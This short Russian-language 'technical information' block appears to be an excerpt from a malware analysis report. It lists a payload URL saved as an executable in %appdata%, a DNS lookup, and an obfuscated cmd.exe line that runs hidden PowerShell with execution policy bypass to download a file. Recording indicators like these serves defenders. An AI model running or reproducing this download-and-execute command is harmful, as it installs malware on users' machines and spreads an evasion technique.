Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^W^ershEL^l.exE^ -E^x^EcuTIO^N^P^ol^i^CY ^b^y^P^As^S ^-^NOPRof^I^Le^ ^-WIN^d^O^w^sT^Y^L^e ^h^id^De^n^ (^nEw^-O^b^jeCT syStEm.^nET^.w^EbcL^ieNT).^DOWN^loAD^f^ILe('htt...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "po^W^ershEL^l.exE^ -E^x^EcuTIO^N^P^ol^i^CY ^b^y^P^As^S ^-^NOPRof^I^Le^ ^-WIN^d^O^w^sT^Y^L^e ^h^id^De^n^ (^nEw^-O^b^jeCT syStEm.^nET^.w^EbcL^ieNT).^DOWN^loAD^f^ILe('htt...' (со скрытым окном)